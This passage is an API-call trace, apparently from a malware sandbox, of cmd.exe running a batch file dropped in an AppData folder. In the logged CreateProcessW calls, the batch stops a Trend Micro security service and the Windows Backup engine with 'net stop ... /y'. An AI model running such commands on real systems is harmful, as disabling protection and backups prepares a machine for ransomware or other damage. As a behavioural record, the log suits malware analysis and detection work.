hHeap=0x3e0000) returned 1 [0045.129] GetProcessHeap () returned 0x3e0000 [0045.129] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0045.129] GetProcessHeap () returned 0x3e0000 [0045.129] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0045.129] GetProcessHeap () returned 0x3e0000 [0045.129] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0045.129] GetProcessHeap () returned 0x3e0000 [0045.129] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0045.129] GetProcessHeap () returned 0x3e0000 [0045.129] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0045.129] _get_osfhandle (_FileHandle=3) returned 0x74 [0045.129] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x75a [0045.129] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x1167, lpOverlapped=0x0) returned 1 [0045.129] SetFilePointer (in: hFile=0x74, lDistanceToMove=1902, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x76e [0045.130] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=20, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop TmCCSF /y\r\nADHelper100 /y\r\n /y\r\ny\r\nΓÇ¥ /y\r\nlures\r\nnded\r\n") returned 20 [0045.130] _get_osfhandle (_FileHandle=3) returned 0x74 [0045.130] GetFileType (hFile=0x74) returned 0x1 [0045.130] _get_osfhandle (_FileHandle=3) returned 0x74 [0045.130] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x76e [0045.130] GetProcessHeap () returned 0x3e0000 [0045.130] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0045.130] GetProcessHeap () returned 0x3e0000 [0045.130] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0045.130] _tell (_FileHandle=3) returned 1902 [0045.130] _close (_FileHandle=3) returned 0 [0045.130] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0045.131] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0045.131] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0045.131] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0045.131] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0045.131] _wcsicmp (_String1="net", _String2="CD") returned 11 [0045.131] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0045.131] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0045.131] _wcsicmp (_String1="net", _String2="REN") returned -4 [0045.131] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0045.131] _wcsicmp (_String1="net", _String2="SET") returned -5 [0045.131] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0045.131] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0045.131] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0045.131] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0045.131] _wcsicmp (_String1="net", _String2="MD") returned 1 [0045.131] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0045.131] _wcsicmp (_String1="net", _String2="RD") returned -4 [0045.131] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0045.131] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0045.131] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0045.131] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0045.131] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0045.131] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0045.131] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0045.131] _wcsicmp (_String1="net", _String2="VER") returned -8 [0045.131] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0045.131] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0045.131] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0045.131] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0045.131] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0045.131] _wcsicmp (_String1="net", _String2="START") returned -5 [0045.131] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0045.131] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0045.131] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0045.131] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0045.131] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0045.131] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0045.132] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0045.132] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0045.132] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0045.132] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0045.132] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0045.132] SetErrorMode (uMode=0x0) returned 0x1 [0045.132] GetProcessHeap () returned 0x3e0000 [0045.132] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0045.132] GetProcessHeap () returned 0x3e0000 [0045.132] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0045.132] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0045.132] GetProcessHeap () returned 0x3e0000 [0045.132] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0045.132] GetProcessHeap () returned 0x3e0000 [0045.132] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0045.132] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0045.132] GetProcessHeap () returned 0x3e0000 [0045.132] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0045.132] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0045.132] GetProcessHeap () returned 0x3e0000 [0045.132] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0045.132] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0045.132] GetProcessHeap () returned 0x3e0000 [0045.132] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0045.132] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0045.132] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0045.133] GetLastError () returned 0x2 [0045.133] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0045.133] GetLastError () returned 0x2 [0045.133] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0045.133] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0045.133] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0045.133] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0045.133] GetLastError () returned 0x2 [0045.133] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0045.134] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0045.134] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0045.134] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0045.134] SetErrorMode (uMode=0x0) returned 0x1 [0045.134] GetProcessHeap () returned 0x3e0000 [0045.134] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0045.134] GetProcessHeap () returned 0x3e0000 [0045.134] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0045.134] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0045.134] GetProcessHeap () returned 0x3e0000 [0045.134] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0045.134] GetProcessHeap () returned 0x3e0000 [0045.134] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0045.134] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7018, Size=0x122) returned 0x3f7018 [0045.134] GetProcessHeap () returned 0x3e0000 [0045.134] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7018) returned 0x122 [0045.134] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0045.134] GetProcessHeap () returned 0x3e0000 [0045.134] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f7148 [0045.134] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f7148, Size=0x76) returned 0x3f7148 [0045.134] GetProcessHeap () returned 0x3e0000 [0045.134] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f7148) returned 0x76 [0045.134] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0045.134] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0045.135] GetLastError () returned 0x2 [0045.135] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0045.135] GetLastError () returned 0x2 [0045.135] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0045.135] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0045.135] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0045.135] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0045.135] GetLastError () returned 0x2 [0045.135] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f8278 [0045.135] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0045.135] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0045.136] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0045.136] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0045.136] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0045.136] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0045.136] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop TmCCSF /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop TmCCSF /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop TmCCSF /y", lpProcessInformation=0x3beae0*(hProcess=0x78, hThread=0x74, dwProcessId=0x85c, dwThreadId=0x894)) returned 1 [0045.140] CloseHandle (hObject=0x74) returned 1 [0045.140] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0045.140] GetProcessHeap () returned 0x3e0000 [0045.140] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0045.140] GetEnvironmentStringsW () returned 0x3f8408* [0045.140] GetProcessHeap () returned 0x3e0000 [0045.140] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0045.140] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0045.140] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0045.389] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0045.389] CloseHandle (hObject=0x78) returned 1 [0045.389] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0045.389] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0045.389] GetProcessHeap () returned 0x3e0000 [0045.389] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0045.389] GetEnvironmentStringsW () returned 0x3f8408* [0045.389] GetProcessHeap () returned 0x3e0000 [0045.389] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0045.389] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0045.389] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0045.389] GetProcessHeap () returned 0x3e0000 [0045.389] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0045.389] GetEnvironmentStringsW () returned 0x3f8408* [0045.389] GetProcessHeap () returned 0x3e0000 [0045.389] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0045.389] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0045.389] GetProcessHeap () returned 0x3e0000 [0045.389] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0045.389] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0045.389] _get_osfhandle (_FileHandle=1) returned 0x264 [0045.389] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0045.390] _get_osfhandle (_FileHandle=1) returned 0x264 [0045.390] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0045.390] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0045.390] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0045.390] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0045.390] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0045.390] SetConsoleInputExeNameW () returned 0x1 [0045.390] GetConsoleOutputCP () returned 0x1b5 [0045.390] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0045.391] SetThreadUILanguage (LangId=0x0) returned 0x409 [0045.391] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0045.391] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0045.391] _get_osfhandle (_FileHandle=3) returned 0x78 [0045.391] SetFilePointer (in: hFile=0x78, lDistanceToMove=1902, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x76e [0045.391] GetProcessHeap () returned 0x3e0000 [0045.391] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0045.391] GetProcessHeap () returned 0x3e0000 [0045.391] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0045.391] GetProcessHeap () returned 0x3e0000 [0045.391] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0045.391] GetProcessHeap () returned 0x3e0000 [0045.391] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0045.391] GetProcessHeap () returned 0x3e0000 [0045.391] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0045.391] GetProcessHeap () returned 0x3e0000 [0045.391] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0045.391] GetProcessHeap () returned 0x3e0000 [0045.391] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0045.391] GetProcessHeap () returned 0x3e0000 [0045.391] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0045.391] GetProcessHeap () returned 0x3e0000 [0045.391] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0045.391] GetProcessHeap () returned 0x3e0000 [0045.391] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0045.391] GetProcessHeap () returned 0x3e0000 [0045.391] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3ef4b0 | out: hHeap=0x3e0000) returned 1 [0045.391] GetProcessHeap () returned 0x3e0000 [0045.391] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0045.391] GetProcessHeap () returned 0x3e0000 [0045.391] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0045.392] _get_osfhandle (_FileHandle=3) returned 0x78 [0045.392] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x76e [0045.392] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0x1153, lpOverlapped=0x0) returned 1 [0045.392] SetFilePointer (in: hFile=0x78, lDistanceToMove=1924, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x784 [0045.392] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=22, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop wbengine /y\r\nHelper100 /y\r\n /y\r\ny\r\nΓÇ¥ /y\r\nlures\r\nnded\r\n") returned 22 [0045.392] _get_osfhandle (_FileHandle=3) returned 0x78 [0045.392] GetFileType (hFile=0x78) returned 0x1 [0045.392] _get_osfhandle (_FileHandle=3) returned 0x78 [0045.392] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x784 [0045.392] GetProcessHeap () returned 0x3e0000 [0045.392] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0045.392] GetProcessHeap () returned 0x3e0000 [0045.392] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0045.393] _tell (_FileHandle=3) returned 1924 [0045.393] _close (_FileHandle=3) returned 0 [0045.393] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0045.393] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0045.393] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0045.393] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0045.393] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0045.393] _wcsicmp (_String1="net", _String2="CD") returned 11 [0045.393] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0045.393] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0045.393] _wcsicmp (_String1="net", _String2="REN") returned -4 [0045.393] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0045.393] _wcsicmp (_String1="net", _String2="SET") returned -5 [0045.393] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0045.393] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0045.393] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0045.393] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0045.393] _wcsicmp (_String1="net", _String2="MD") returned 1 [0045.393] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0045.393] _wcsicmp (_String1="net", _String2="RD") returned -4 [0045.393] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0045.393] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0045.393] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0045.393] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0045.393] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0045.393] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0045.393] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0045.393] _wcsicmp (_String1="net", _String2="VER") returned -8 [0045.393] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0045.393] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0045.393] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0045.393] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0045.394] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0045.394] _wcsicmp (_String1="net", _String2="START") returned -5 [0045.394] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0045.394] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0045.394] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0045.394] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0045.394] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0045.394] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0045.394] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0045.394] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0045.394] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0045.394] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0045.394] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0045.394] SetErrorMode (uMode=0x0) returned 0x1 [0045.394] GetProcessHeap () returned 0x3e0000 [0045.394] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0045.394] GetProcessHeap () returned 0x3e0000 [0045.394] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0045.394] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0045.394] GetProcessHeap () returned 0x3e0000 [0045.394] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0045.394] GetProcessHeap () returned 0x3e0000 [0045.394] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0045.394] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6d58, Size=0x122) returned 0x3f6d58 [0045.394] GetProcessHeap () returned 0x3e0000 [0045.394] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6d58) returned 0x122 [0045.394] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a990640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0045.394] GetProcessHeap () returned 0x3e0000 [0045.394] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xe0) returned 0x3f81f8 [0045.394] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f81f8, Size=0x76) returned 0x3f81f8 [0045.394] GetProcessHeap () returned 0x3e0000 [0045.394] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f81f8) returned 0x76 [0045.395] GetDriveTypeW 